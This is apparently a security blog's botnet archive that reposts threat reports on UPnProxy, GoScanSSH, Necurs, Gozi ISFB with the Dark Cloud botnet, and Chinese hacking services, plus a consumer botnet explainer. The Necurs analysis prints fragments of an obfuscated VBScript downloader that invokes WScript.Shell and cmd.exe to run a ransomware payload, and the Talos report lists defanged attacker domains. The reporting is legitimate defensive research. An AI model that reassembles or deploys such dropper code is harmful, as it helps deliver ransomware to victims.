Category Archives: botnet

Botnets present 195,000 security threats every day

More than 100 million unique targets are being hit on a daily basis.Botnets, networks of infected machines that are used by cybercriminals everywhere to do their sinister bidding, are still

The post Botnets present 195,000 security threats every day appeared first on The Cyber Security Place.

Real-time detection of consumer IoT devices participating in DDoS attacks

Could we detect compromised consumer IoT devices participating in a DDoS attack in real-time and do someting about it? A group of researchers Princeton University have presented some encouraging results showing that the first part of that equation can be relatively easily solved. As IoT traffic is often distinct from that of other Internet connected devices and as machine learning has proved promising for identifying malicious Internet traffic, they decided to use these facts to … More

The post Real-time detection of consumer IoT devices participating in DDoS attacks appeared first on Help Net Security.

Experts uncovered a proxy botnet composed of over 65,000 routers exposed via UPnP protocol

Security researchers at Akamai have discovered a proxy botnet composed of more than 65,000 routers exposed to the Internet via the Universal Plug and Play (UPnP) protocol.

Crooks have compromised the devices of this multi-purpose proxy botnet to conduct a wide range of malicious activities, including spamming and phishing, click fraud, account takeover and credit card fraud, distributed denial of service (DDoS) attacks, malware distribution, and also bypassing censorship,

While the researchers were investigating attacks against its customers they discovered that vulnerable devices have NAT injections that allow attackers to abuse them.

“While researching UPnP-enabled devices detected as participants in attacks against Akamai customers, we discovered that some devices appeared to be more susceptible to this vulnerability than others, and contained malicious NAT injections.” reads the analysis published by Akamai. “These injections were present on a handful of the devices found in the wild, and appeared to be part of an organized and widespread abuse campaign”

proxy botnet injection bypass

Akamai discovered over 4.8 million devices that were found to be vulnerable to simple UDP SSDP inquiries. Of these, roughly 765,000 (16% of total) were confirmed to also
expose their vulnerable TCP implementations while over 65,000 (1.3% of total) were discovered to have NAT injections.

“These injections appeared to point to multiple services and servers around the Internet. A majority of the injections appear to target TCP ports 53 (15.9M for DNS), 80 (9.5M for HTTP), and 443 (155K for HTTPS).” continues the analysis. “A wide range of devices are affected, most of them being consumer-grade networking hardware. “73 brands/manufacturers and close to 400 models [were affected].”

The UPnP communication protocol is widely adopted even if it is known to be vulnerable. In early 2013, researchers at Rapid7 published an interesting whitepaper entitled “Security Flaws in Universal Plug and Play” that evaluated the global exposure of UPnP-enabled network devices.

The report highlighted that over 23 million IPs related to Portable UPnP SDK were vulnerable to remote code execution just through a single UDP packet, over 6,900 product versions from over 1,500 vendors were vulnerable through UPnP due to the exposure of UPnP SOAP service to the internet.

Abusing the protocol attackers can control the traffic in and out the networks, UPnP allows the automated negotiation and configuration of port opening/forwarding within a NATed networking environment.

The malicious botnet uncovered by Akamai is composed of vulnerable devices including malicious NAT injections, it turns routers into proxies, for this reason, the experts called the injected devices UPnProxy.

“The injected NAT entries were designed to be working in sets across various devices. Thus, across the 65,000 infected devices, 17,599 unique endpoint IP addresses were discovered.” continues the report. “The most-identified IP was injected over 18.8 million times across 23,286 devices, while the second-most-injected IP appeared over 11 million times across 59,943 devices.”

According to Akamai, part of this proxy botnet was already discovered by researchers at Symantec while investigating into the “Inception Framework” used by an APT group, in that circumstance Symantec research confirmed that the UPnProxy instances were used obfuscate the operators’ true locations.

The APT associated with Inception Framework is still active and continuously evolved its arsenal and TTPs.

In order to check if your router has been compromised for UPnProxying is to scan the endpoint and audit your NAT table entries.

Many frameworks and libraries available online could be used for this purpose.

Pierluigi Paganini

(Security Affairs – UPnP, proxy botnet)

The post Experts uncovered a proxy botnet composed of over 65,000 routers exposed via UPnP protocol appeared first on Security Affairs.

BSidesSF Preview: Why It Is Important to Understand the HTTP-Based Botnets C&C Deployments

Crimeware is increasing at an exponential rate. Attackers and underground sellers now use crimeware-as-a-cervice (CaaS) models to sell crimeware services to buyers. These days, one does not need to be tech savvy to conduct attacks on the Internet as CaaS has made this process easier. One of the main CaaS channels is the selling of […]… Read More

The post BSidesSF Preview: Why It Is Important to Understand the HTTP-Based Botnets C&C Deployments appeared first on The State of Security.

GoScanSSH Malware spread avoiding Government and Military networks

Security experts at Cisco Talos discovered a new piece of malware dubbed GoScanSSH that was being used to compromise SSH servers exposed online.

Security researchers at Cisco Talos have discovered a new piece of malware dubbed GoScanSSH that was being used to compromise SSH servers exposed online.

The malicious code was written in Go programming language, uncommon for malware development, and implements several interesting features, for example, it tries to avoid infecting devices on government and military networks.

“Talos identified a new malware family that was being used to compromise SSH servers exposed to the internet. This malware, which we have named GoScanSSH, was written using the Go programming language, and exhibited several interesting characteristics.” reads the analysis published by Talos.

The attacker created unique malware binaries for each infected system, researchers also reported that the GoScanSSH command and control (C2) infrastructure was leveraging the Tor2Web proxy service making hard the tracking of the C&C infrastructure and resilient to takedowns.

GoScanSSH conducted brute-force attack against publicly accessible SSH servers that allowed password-based SSH authentication. The hackers are leveraging a word list containing more than 7,000 username/password combinations. When GoScanSSH discovered a valid credential set, a unique GoScanSSH malware binary is then created and uploaded to the compromised SSH server and executed.

While scanning for vulnerable SSH servers, GoScanSSH randomly generates IP addresses, avoiding special-use addresses. the malware then compares each IP address to a list of CIDR blocks that the malicious code will not attempt to scan because they are network ranges primarily controlled by various government and military entities.

The malware specifically avoids ranges assigned to the U.S. Department of Defense, experts also noticed that one of the network ranges in the list is assigned to an organization in South Korea.

The researchers detected more than 70 unique malware samples associated with the GoScanSSH malware family, the experts observed samples that were compiled to support multiple system architectures including x86, x86_64, ARM and MIPS64.

The experts also observed multiple versions (e.g, versions 1.2.2, 1.2.4, 1.3.0, etc.) of the malware in the wild, a circumstance that suggests the threat actors behind the malicious code is continuing to improve the malware.

 GoScanSSH malware dns queries

According to the researchers, threat actors are likely trying to compromise larger networks, experts believe attackers are well resourced and with significant skills.

They are being active since June 2017 and already deployed 70 different versions of the GoScanSSH malware using over 250 distinct C&C servers.

The analysis of passive DNS data related to all of the C2 domains collected from all of the samples Talos analyzed confirmed that the number of infected systems is low.

“In analyzing passive DNS data related to all of the C2 domains collected from all of the samples Talos analyzed, resolution attempts were seen dating back to June 19, 2017, indicating that this attack campaign has been ongoing for at least nine months. Additionally, the C2 domain with the largest number of resolution requests had been seen 8,579 times.” states the analysis published by Talos.

Further details on the GoScanSSH malware, including IoCs, are reported in the analysis published by Talos.

Pierluigi Paganini

(Security Affairs – GoScanSSH malware, hacking)

The post GoScanSSH Malware spread avoiding Government and Military networks appeared first on Security Affairs.

Security Affairs: GoScanSSH Malware spread avoiding Government and Military networks

Security experts at Cisco Talos discovered a new piece of malware dubbed GoScanSSH that was being used to compromise SSH servers exposed online.

Security researchers at Cisco Talos have discovered a new piece of malware dubbed GoScanSSH that was being used to compromise SSH servers exposed online.

The malicious code was written in Go programming language, uncommon for malware development, and implements several interesting features, for example, it tries to avoid infecting devices on government and military networks.

“Talos identified a new malware family that was being used to compromise SSH servers exposed to the internet. This malware, which we have named GoScanSSH, was written using the Go programming language, and exhibited several interesting characteristics.” reads the analysis published by Talos.

The attacker created unique malware binaries for each infected system, researchers also reported that the GoScanSSH command and control (C2) infrastructure was leveraging the Tor2Web proxy service making hard the tracking of the C&C infrastructure and resilient to takedowns.

GoScanSSH conducted brute-force attack against publicly accessible SSH servers that allowed password-based SSH authentication. The hackers are leveraging a word list containing more than 7,000 username/password combinations. When GoScanSSH discovered a valid credential set, a unique GoScanSSH malware binary is then created and uploaded to the compromised SSH server and executed.

While scanning for vulnerable SSH servers, GoScanSSH randomly generates IP addresses, avoiding special-use addresses. the malware then compares each IP address to a list of CIDR blocks that the malicious code will not attempt to scan because they are network ranges primarily controlled by various government and military entities.

The malware specifically avoids ranges assigned to the U.S. Department of Defense, experts also noticed that one of the network ranges in the list is assigned to an organization in South Korea.

The researchers detected more than 70 unique malware samples associated with the GoScanSSH malware family, the experts observed samples that were compiled to support multiple system architectures including x86, x86_64, ARM and MIPS64.

The experts also observed multiple versions (e.g, versions 1.2.2, 1.2.4, 1.3.0, etc.) of the malware in the wild, a circumstance that suggests the threat actors behind the malicious code is continuing to improve the malware.

 GoScanSSH malware dns queries

According to the researchers, threat actors are likely trying to compromise larger networks, experts believe attackers are well resourced and with significant skills.

They are being active since June 2017 and already deployed 70 different versions of the GoScanSSH malware using over 250 distinct C&C servers.

The analysis of passive DNS data related to all of the C2 domains collected from all of the samples Talos analyzed confirmed that the number of infected systems is low.

“In analyzing passive DNS data related to all of the C2 domains collected from all of the samples Talos analyzed, resolution attempts were seen dating back to June 19, 2017, indicating that this attack campaign has been ongoing for at least nine months. Additionally, the C2 domain with the largest number of resolution requests had been seen 8,579 times.” states the analysis published by Talos.

Further details on the GoScanSSH malware, including IoCs, are reported in the analysis published by Talos.

Pierluigi Paganini

(Security Affairs – GoScanSSH malware, hacking)

The post GoScanSSH Malware spread avoiding Government and Military networks appeared first on Security Affairs.

Security Affairs

Understanding the Relationship Between AI and Cybersecurity

DaThe first thing many of us think about when it comes to the future relationship between artificial intelligence (AI) and cybersecurity is Skynet—the fictional neural net-based group mind from the

The post Understanding the Relationship Between AI and Cybersecurity appeared first on The Cyber Security Place.

Necurs Botnet Leads the World in Sending Spam Traffic

In Q4 2017 we found that the Necurs and Gamut botnets comprised 97% of spam botnet traffic. (See the McAfee Labs Threats Report, March 2018.) Necurs (at 60%) is currently the world’s largest spam botnet. The infected computers operate in a peer-to-peer model, with limited communication between the nodes and the control servers. Cybercriminals can rent access to the botnet to spread their own malicious campaigns.

The most common techniques are email attachments with macros or JavaScript to download malware from different locations. In October, the Locky ransomware campaign used Microsoft’s Dynamic Data Exchange to lure victims into “updating” the attached document with data from linked files—external links that delivered the malware.

In Q4 we noticed several botnet campaigns delivering the following payloads:

  • GlobeImposter ransomware
  • Locky ransomware
  • Scarab ransomware
  • Dridex banking Trojan

A timeline:

Let’s zoom in on one of the campaigns from the Necurs botnet. In the following example, an email automatically sent from a VOIP system informs the victim of a missed call. The email contains an attachment, a Visual Basic script.

In this case, the name is “Outside Caller 19-12-2017 [random nr].” Here is some of the script code:

Execute "Sub Aodunnecessarilybusinesslike(strr):ZabiT.Savetofile writenopopbusinesslikeInPlaceOf , 2 : End Sub"

Disaster = "//21+12:ptth21+12ex"+"e.eUtaLHpbP\21+12elifotevas21+12ydoBes"+"nopser21+12etirw21+12nepo21+12epyT21+12PmeT21+12TeG21+12ssecorP21+12llehs.tpircsW21+12noitacilppA.llehs21+12" & "" 


This piece of code makes sure that the embedded code will be saved to a file. Note the second line of code: It is backward and calls the Windows script shell to execute the code. The following code string ensures that the backward line is read properly:

SudForMake = Split("Microsoft.XMLHTTP21+12Adodb.streaM"+StrReverse(Disaster),  "21+12")


The following line starts the saved code:

writenopopbusinesslikeMacAttack.Run("cmd."&"exe /c START """" "+" " & ArrArr ) 


Once the executable is started, it attempts to download the ransomware from the embedded URLs in the code: 

krapivec = Array("","","") 


The malware downloaded and executed is GlobeImposter ransomware. After encrypting all files and deleting the Volume Shadow copies to block file restore, the user is prompted with the request to buy the decryptor:

Spam botnets are one of the pillars of the cybercrime business. The authors of these botnets understand their market value and spend their rental income on continuous development. Their work keeps the infrastructure running, creates ever-changing spam messages, and delivers these messages to your inbox—with many avoiding spam blockers. This cybercrime effort should inspire your organization to discuss the implementation of DMARC (domain-based message authentication, reporting & conformance). To learn more about how DMARC can help protect against this kind of threat, visit For more on Necurs, see the McAfee Labs Threats Report, June 2017.

The post Necurs Botnet Leads the World in Sending Spam Traffic appeared first on McAfee Blogs.

Gozi ISFB Remains Active in 2018, Leverages “Dark Cloud” Botnet For Distribution

This blog post was authored by Edmund Brumaghin and Holger Unterbrink, with contributions from Adam Weller.

Executive Summary

Gozi ISFB is a well-known and widely distributed banking trojan, and has been in the threat landscape for the past several years. Banking trojans are a type of malware that attackers leverage in an attempt to obtain banking credentials from customers of various financial institutions. The source code associated with Gozi ISFB has been leaked several times over the years, and the robust features available within the Gozi ISFB code base have since been integrated into additional malware, such as GozNym. Talos published detailed research about GozNym in a September 2016 blog post. Since then, Talos has been monitoring Gozi ISFB activity, and has discovered a series of campaigns over the past six month that have been making use of the elusive "Dark Cloud" botnet for distribution. In investigating the infrastructure associated with Dark Cloud, we identified a significant amount of malicious activity making use of this same infrastructure, including Gozi ISFB distribution, Nymaim command and control, and a variety of different spam campaigns and scam activity. Talos is publishing details related to ongoing Gozi ISFB activity, the Dark Cloud botnet, as well as the additional threats we have observed using this infrastructure over the past couple of years.

Campaign Details

Talos has observed several distribution campaigns over the past few months that exhibit unusual characteristics. These campaigns appear to be relatively low-volume, with the attackers choosing to target specific organizations. They do not appear to send large amounts of spam messages to the organizations being targeted, instead choosing to stay under the radar while putting extra effort into the creation of convincing emails, in an attempt to evade detection while maximizing the likelihood that the victim will open the attached files.

Our engineers have discovered that while the Gozi ISFB campaigns are ongoing, the distribution and C2 infrastructure does not appear to stay active for extended periods, making analysis of older campaigns and samples more difficult. The attackers appear to be very quickly moving to new domains and IP addresses, not only for each campaign, but also for individual emails that are part of the same campaign. The campaigns that Talos analyzed took place during the fourth quarter of 2017, and have continued into 2018, with new campaigns being launched every week in an attempt to ensnare more victims and generate revenue for the attackers.

Malicious Spam Campaigns

This malware is distributed using malicious spam email campaigns, which feature Microsoft Word file attachments that function as malware downloaders. The emails appear targeted in nature, an example of which is shown below.

Interestingly, the attackers chose to create emails that appear to be part of an existing email thread, likely in an attempt to convince the victim of their legitimacy. In addition to crafting the email delivering the malicious Word document, they also create additional email subjects and accompanying bodies, which were included with the malicious email. This is not something that is typically seen in most malicious email campaigns, and shows the level of effort the attackers put into making the emails seem legitimate to maximize the likelihood that the victim would open the attached file.
Figure 1: Example Email Message

When opened, the attached Word document displays the following decoy image that makes it appear as if the attachment is a document that was created using Office 365. It instructs the user to "Enable Editing" and then "Enable Content."
Figure 2: Malicious Word Document
In the case that the victim follows the instructions, macros embedded within the Word document will execute, facilitating the download and executing the malware from an attacker-controlled server. The infection process associated with these emails is described in the following section.

Infection Process

As mentioned above, the Word documents come with an embedded, obfuscated visual basic for applications, or VBA, macro, which in most cases, is executed when the document is closed by the victim, as shown in the following screenshot. Executing the macro when the document is closed is a clever trick to bypass some sandbox systems, which only open the documents, but never close them during analysis.
Figure 3: Obfuscated VBA Macro
Once deobfuscated, the macro does nothing more than simply download an HTA file from a web server. Figure 4 shows the deobfuscated final call from the script above. In other documents, they are using different or slightly modified VBA macros, but deobfuscated, they all do a similar final call, similar to what is shown in Figures 4 and 5.
Figure 4: Final Macro Call
Figure 5: Alternate Macro Call
Due to the fact that HTA files are seen as local applications, the content is executed as a fully trusted application. Therefore, no security-related questions are asked to the user. The content that is downloaded from qdijqwdunqwiqhwew[.]com is an obfuscated JavaScript script (see Figure 6)
Figure 6: Obfuscated JavaScript
The lopomeriara variable is a very long obfuscated string which we have shortened (...) in the screenshot. Deobfuscated, it resolves to:
Figure 7: Deobfuscated Javascript
In other words, it is using ActiveX to execute a PowerShell script, which downloads and executes the malware to be installed on the victim's machine. In this case the filename was 84218218.exe.

We have analyzed more than 100 malicious Word documents from this campaign, and it appears that the vast majority of them are individualized. The individualized ones all appear similar, but all their hashes are different, and their VBA code is either completely different or at least slightly modified. Even the image that the adversaries are using in these documents (see Figure 8) is not the same — it differs by slightly changed color values and pixels as you can see in Figure 9.
Figure 8: Document Image

Figure 9: Image Comparison
An example of the slightly changed VBA code skeleton can be seen in Figure 10. The adversaries are changing variables, function names, arrays, etc. for more or less every single Word document. Nevertheless, in the majority of documents, the basic code structure stays the same. Sometimes they are re-ordering the functions, or they add or remove a few lines of code. But as shown in Figures 10 and 11, the main algorithms stay the same.
Figure 10: VBA Skeleton Comparison
Figure 11: Additional Comparison
As mentioned above, there are some documents where the VBA script is completely different. The rightmost image in Figure 12 is an example of this. Deobfuscated, it is doing the same known "http://<some server>/...php?utma=...." HTTP request which we have seen before.

Figure 12: VBA Code Differences
We focused the majority of our investigation on campaigns between the fourth quarter of 2017 until the present, but based on other reports and our telemetry data, they have likely been going on for a couple of years. Within the data that we collected, the adversaries have changed the images within the Word documents from time to time (Figures 13 and 14) and used different VBA code in their malicious macros. The schema stays the same, the pixels and color values of the pictures inside the different campaigns are slightly changed, but the message stays the same.
Figure 13: Earlier Document Image

Figure 14: Document Image Font Differences
An interesting point is that some of them are even localized, as you can see below in Figure 15. This matches the corresponding phishing emails we talked about before. The separate attacks are highly customized and targeted.
Figure 15: Document Image Localization



The payload (e.g. 84218218.exe as described above), is different depending on the specific campaign. The vast majority of payloads are banking trojans based on the Gozi ISFB code base, but we have also seen executables identified by AV products as belonging to other malware families, such as CryptoShuffler, Sennoma and SpyEye. We have looked closer into the payload mentioned above, and we can clearly identify it as ISFB. Its functionality is very similar to the one described in this report by the Polish Computer Emergency Response Team (CERT). For example, the sample is using the same rolling XOR algorithm to protect its strings.

The anti-VM methods used within this sample are also identical — the BSS section encryption and the dropper payload setup are very similar. The dropper is also obfuscated with useless strings. It is interesting to note that in the sample we analyzed, the DGA code mentioned in the paper above is included, but it is never used due to its configuration. The sample we analyzed was using a hardcoded domain to communicate with the C2 server. This domain is tmeansmderivinclusionent[.]net. The sample was not configured to use TOR.

Regarding the decryption of the BSS section, this sample presents a particularity. It has a loop, which creates small temporary files with a random file name. After creating the files, it queries their creation file time. Then, it applies some transformations to the four least significant bytes of this timestamp to generate a one-byte value. Due to the transformation algorithm, this will result in a value between 0x00000008 and 0x000000FF. See the pseudocode below:

t = t >> 16
t = t & 0x000000F7
t = t + 8

This one-byte value is then added to the decryption key. With this key, the malware tries to decrypt the BSS section. If the decryption fails, it starts the loop again, and creates the next file until the section has been properly decoded. This technique seems to replace the anti-sandbox technique based on mouse movement mentioned in previous reports. Although this approach would not hinder dynamic analysis in a full-system VM, we believe it could be an attempt to bypass simpler application-level emulators that may not properly implement the Windows API (e.g., those which might return a fixed timestamp).

The malware loader contains two versions of the same DLL. One is a 32-bit DLL, and the other is a 64-bit DLL, both of which contain the malware's hardcoded configuration. The way they store the DLLs and configuration values is by leveraging a set of structures indexed in an array located right after the section table (referred to as FJ-struct in the report mentioned above). After the decryption, depending on the victim machine, either the 32-bit or the 64-bit DLL is injected into the explorer.exe process running on the victim machine.

The Dark Cloud Botnet

In analyzing the domains and associated infrastructure used to distribute this malware, as well as the associated C2 domains, Talos identified significant overlap between the infrastructure used in these campaigns and what has been described as being associated with a botnet referred to as "Dark Cloud." This botnet was initially described in 2016 in a blog post here. This botnet is interesting, as it was reportedly initially created to provide a "bulletproof" way to host several carding sites. It has since expanded, and is also being used for the distribution and administration of various malware families. During our analysis of the infrastructure being used, we identified significant Gozi ISFB and Nymaim distribution and C2, adult dating spam, various carding resources and other malicious activities from this infrastructure.

There are several interesting characteristics associated with this particular botnet. One of the most prominent is the use of fast flux techniques, which makes tracking the backend infrastructure more difficult. By frequently changing the DNS records associated with the malicious domains, attackers can make use of an extensive network of proxies, continuously changing the address of the IP being used to handle communications to the web servers the attacker controls.

Talos observed that the time-to-live (TTL) value for DNS records associated with domains used in these malware campaigns were typically set to 150, allowing the attackers to issue DNS record updates every three minutes.
Figure 16: Sample DNS TTL Values
As we began investigating the domains and IP addresses associated with the distribution and post-infection C2 of Gozi ISFB, we noticed that in most of the cases the same infrastructure was being used by the various carding forums referenced in the KrebsOnSecurity article mentioned above. Using passive DNS data, we collected every IP address that the domains under investigation had been seen resolving to. We also performed the reverse operation, collecting every domain that had ever been seen resolving to the IP addresses we previously collected in an attempt to get the most complete picture of the infrastructure.

Once we had this information collected, we began to investigate all of the activity that had been observed associated with this infrastructure. What we discovered was a laundry list of cybercriminal activities, all being conducted using this same infrastructure over the past couple of years.

One of the most notable carding forums leveraging this fast flux botnet is known as Uncle Sam.
Figure 17: Uncle Sam Website
In addition to Uncle Sam, we also observed the following carding sites and forums also making use of this infrastructure:
  • Paysell
  • Try2Swipe
  • CVVShop
  • Csh0p
  • RoyalDumps
  • McDuck
  • Prvtzone
  • Verified
Note that in several cases, the site owners had registered their domains using multiple TLDs (such as .BZ, .WS and .LV TLDs, for example).

We wrote a script that captured all of the IP addresses that the Uncle Sam website resolved to over a 24-hour period. We determined that over this period, the website had resolved to 287 unique IP addresses. This equates to an IP rotation of approximately 12 times per hour, or every five minutes. This demonstrates just how fluid the DNS configuration associated with these domains is and how much infrastructure is being used by these attackers.

In addition to various carding websites, we also identified a significant number of Nymaim samples which were beaconing out to IP addresses within this botnet. Nymaim is a malware family that functions as a downloader for additional malware, most commonly seen associated with the delivery of ransomware.

Talos also observed that over the past couple of years, several of the domains we investigated were hosting fake mail generator applications, primarily used to generate spam messages associated with various adult dating websites.

Geographic Distribution

In analyzing all of the infrastructure associated with this botnet, we identified that the attackers appear to be actively avoiding using proxies and hosts located in Western Europe, Central Europe and North America. The majority of the systems we analyzed were located in Eastern Europe, Asia, and the Middle East. Below is a graphic showing where the largest number of systems were located globally.

Figure 18: Geographic Heat Map
Additionally, the following bar graph shows the hosting providers around the world that were most heavily used for hosting the systems used by this botnet.

Figure 19: Most Impacted ASNs
Talos is continuing to investigate and track the operations of this botnet to ensure customers remain protected from the various threats that are associated with it.


Gozi ISFB is a banking trojan that has been used extensively by attackers who are targeting organizations around the world. It has been around for the past several years, and ongoing campaigns indicate that it will not be going away any time soon. Attackers are continuing to modify their techniques and finding effective new ways to obfuscate their malicious server infrastructure in an attempt to make analysis and tracking more difficult. Talos has identified the Dark Cloud botnet being used for a multitude of malicious purposes. We will continue to monitor these threats as they continue to evolve over time to ensure that customers remain protected and the public is informed with regards to continued use of threats such as Gozi ISFB, Nymaim and others.


Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on

SNORT IDs: 39686, 42894

Indicators of Compromise (IOC)

Malicious Document Hashes

A full list of malicious documents associated with these campaigns can be found here.


A full list of domains associated with these campaigns can be found here.

IP Addresses

A full list of IP addresses associated with these campaigns can be found here.

Executable File Hashes

A full list of executable hashes associated with these campaigns can be found here.

What Is a Botnet?

Robot armies on attack may sound like science fiction, but this is a security reality we’ve been facing for some time. You may have heard of recent threats where popular websites were knocked completely offline, or servers were forced to mine for cryptocurrencies by giant “botnets”. But you might not have known exactly what a botnet is, and how the devices in your home could easily become part of one.

A botnet is a collection of connected devices, or “bots” (short for robots), that are infected and controlled by malware. These devices could include your PC, webcam, or any number of connected appliances in your home. The cybercriminals who distribute malware to create botnets are generally looking to use the combined computing power of all the infected devices to launch much larger attacks.

Take, for example, the Mirai botnet, which infected millions of consumer devices such as IP cameras and home routers to launch a distributed denial of service attack that was able to cripple major websites such as Netflix, Twitter, and Reddit. Mirai took advantage of the low-level of security on most home connected devices. All the malware had to do was guess a password—many of which are known factory defaults—to seize control.

Botnets have been around for a long time, with the first instances recorded in the early 2000s as a way to send massive amounts of spam emails. But these days cybercriminals are eyeing the huge computing potential of millions of IoT devices to create botnets that can launch targeted attacks, or make money.

Some large botnets have become money-making enterprises unto themselves, with cybercrooks reselling their resources to users who want to launch their own attacks, say against online gaming rivals.

But, no matter what a botnet is used for there are a number of reasons why you don’t want your computers and devices to wind up as part of a nefarious network. Botnet malware can significantly slow down your computer or device, and keep it from functioning properly. In the case of computers, this slowdown can potentially keep you from downloading critical security updates, leaving you at an even greater risk for data theft. The malware can also be used to spam your friends and contacts in your name, and launch attacks against other networks, all without your knowledge.

Follow these important tips to keep your devices from joining the botnet army: 

  • Change Device Passwords—The first thing you want to do when you get a new IoT device is to change its default password, making it much harder for a potential attacker to gain access. Check your user’s manual for security settings. If the device has little or no built-in security, consider investing in more secure devices.
  • Keep your software up-to-date—This goes for both computer software and device firmware. Manufacturers regularly release software updates that can protect you from known vulnerabilities, so you want to make sure that you are always running the latest versions.
  • Always Use a Firewall—Firewalls monitor traffic between your Internet connection and your devices to detect unusual behavior. Even if one of your devices is infected, a firewall can keep a potential attacker from accessing all the other devices on the same network. Firewalls are often included in comprehensive security software, ensuring that all your computers and devices have protection.
  • Setup a Separate IoT Network—Instead of putting all your IoT devices on your regular home network, consider setting up a guest network that doesn’t share access to your other devices and data. Check your router manufacturer’s website to learn how. Or, consider getting a router with built-in security features, making it easier to protect all the devices in your home from one access point.
  • Practice Safe Surfing—So called “drive by” malware, which can infect your device simply by visiting a compromised website, or clicking on a dangerous ad, is being increasingly used to create botnets. In fact, millions of websites are now thought to be infected with crypto-mining malware. That’s why it’s important to be careful where you click. Make sure that you are using antivirus software, and that you enable ad blocking.And to prevent your computer from being infected with crypto mining software specifically, you may also consider installing a browser extension such as Chrome’s No Coin, or Opera for Android. Both actively block coin miners.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

The post What Is a Botnet? appeared first on McAfee Blogs.

Chinese Cybercriminals Develop Lucrative Hacking Services

Underground cybercrime profits in China have likely already exceeded US$15.1 billion (100 billion Chinese yuan); caused more than $13.8 billion (91.5 billion yuan) worth of damage relating to data loss, identity theft, and fraud; and will grow at an even faster pace as underground hackers expand international business operations to increasingly target foreign businesses, according to one report. Advanced hacking tools such as botnet, control server infrastructure, remote access tools, malware creation and obfuscation services, source-code writing services, and targeted exploitation toolkits are available on underground markets.

Other popular malicious tools and hacking services—such as spam and flooding services, denial-of-service or distributed denial-of-service attack scripts, compromised routers, and hijacked accounts—are also available in China on the black market. Criminal groups are well-organized and establish discreet buying and selling processes for malware and hacking services through QQ networks. (Tencent QQ is one of China’s most popular online communication and Internet service portals. It had more than 870 million active monthly users as of 2016. QQ users can communicate with each other or publish comments through QQ forums, shared space, QQ groups, and private chatrooms.)

Criminal groups also establish master-apprentice relationships to recruit and train new members to expand their criminal enterprise operations. All of these trends cost businesses in China and around the world tens of billions of dollars, as hacking tools sold online can be used to steal intellectual property or create social engineering attacks.

Operating Structure

The Chinese cybercriminal underground market has become more sophisticated and service-oriented as China’s economy becomes more digital. Cybercriminal groups are well-structured with a clear division of work. Contrary to their American and Russian counterparts, Chinese cybercriminals do not rely on the Deep Web. McAfee research indicates that there has been an increasing number of organized crime groups that take advantage of burgeoning QQ networks. These organized crime groups typically possess clear mechanisms for their cybercrime operations. Malware developers usually profit by creating and selling their products online; they do not get involved in underground criminal operations. Their code often includes “backdoors” that offer them continued access to their software.

QQ hacking group masters (qunzhu, 群主), also known as prawns (daxia, 大虾) or car masters (chezu, 车主) by those in Chinese cybercriminal underground networks, are the masterminds of cybercrime gangs. QQ hacking group masters purchase or acquire access to malware programs from a malware writer or wholesaler. As shown in the following graph, QQ hacking group masters recruit members or followers, who are commonly known as apprentices, and instruct apprentices on hacking techniques such as setting up malicious websites to steal personally identifiable information or bank accounts. In most cases, QQ hacking group masters collect “training fees” from the apprentices they recruit. The apprentices later become professional hackers working for their masters. Apprentices are also required to participate in multiple criminal “missions” before they complete the training programs. These hacker groups are usually private: The group masters can accept or deny membership requests on QQ networks.


Master-Apprentice Mechanism

Black-hat training is growing in popularity on the black market due to high profit margins in the hacking business. Some hacker groups use these training programs to recruit new members.  Once they complete the training, selected members will be offered an opportunity as apprentices or “hackers in training,” who later become full-time hackers responsible for operations such as targeted attacks, website hacking, and database exfiltration. (See the preceding graph.) The apprentices gain further experience by taking part in cybercrime schemes, including stealing bank account passwords, credit card information, private photos, personal videos, and virtual currency such as Q coins. The following screenshot is an example of black-hat hacker training materials offered by an underground hacker.

Training program offered by an underground hacker.


The Chinese cybercriminal underground business has become more structured, institutional, and accessible in recent years. A great number of QQ hacking groups offer hacking services. Just as in the real world, cybercriminals and hackers take online orders. Prospective customers can fill out their service requests—including types of attacks, targeted IP addresses, tools to be deployed—and process the payments online. For example, some QQ groups provide website takedown services, which can cost up to tens of thousands of yuan, depending on the difficulty of the tasks and the security level of a targeted system. There are also QQ groups that hire black-hat hackers to conduct attacks against commercial and government targets for profit. The following list shows many of the top activities:

  • DDoS services
  • Black-hat training
  • Malware sales
  • Advanced persistent attack services
  • Exploit toolkits sales
  • Source-code writing services
  • Website hacking services
  • Spam and flooding services
  • Traffic sales
  • Phishing website sales
  • Database hacking services

Buying Hacking Services and Malware

Some hacking groups provide 24/7 technical support and customer service for customers who do not have a technical background. A hacking demonstration is also available upon request. Prices are negotiable in some cases. After agreeing on the price, the hacker-for-hire sends an email confirmation with detailed payment information. Prospective clients can transfer payments online through Taobao or Alipay.  However, prospective customers are usually required to submit an upfront deposit, which can be as much as 50% of the agreed price. Once the service is complete, the hacker-for-hire will request payment on the remaining balance.

Steps in the hacking service transaction process:

  • Negotiating price
  • Making a deposit
  • Demonstration (if requested)
  • Beginning the hacking services
  • Paying the balance

Buyers must submit full payment for software purchases such as malware, attack tools, and exploit toolkits.

Steps in the malware purchase transaction process:

  • Negotiating price
  • Paying in full for malware
  • Receiving product or exploit kit


The Chinese cybercriminal underground mostly targets Chinese citizens and businesses. However, a growing number of criminal groups offer hacking services that target foreign websites or businesses. These underground criminal groups are stealthy and have gradually grown in sophistication through an institutionalized chain of command, and by setting master-and-apprentice relationships to expand their business operations.  They offer a variety of malicious tools and hacking services through QQ networks and have established successful surreptitious transaction processes.


Follow all our research and stories like these on Twitter at @McAfee_Labs.

The post Chinese Cybercriminals Develop Lucrative Hacking Services appeared first on McAfee Blogs.

TrickBot’s New Magic Trick: Sending Spam

TrickBot's New Magic Trick ==>  Sending SPAM

It has been a while since we had a blog from Arsh Arora, who is pursuing his Ph.D., which has kept him away from blogging for a bit. With his current focus on analyzing Banking Trojans and Ransomware, he came across something this weekend that was too interesting not to share!  Take it away, Arsh!

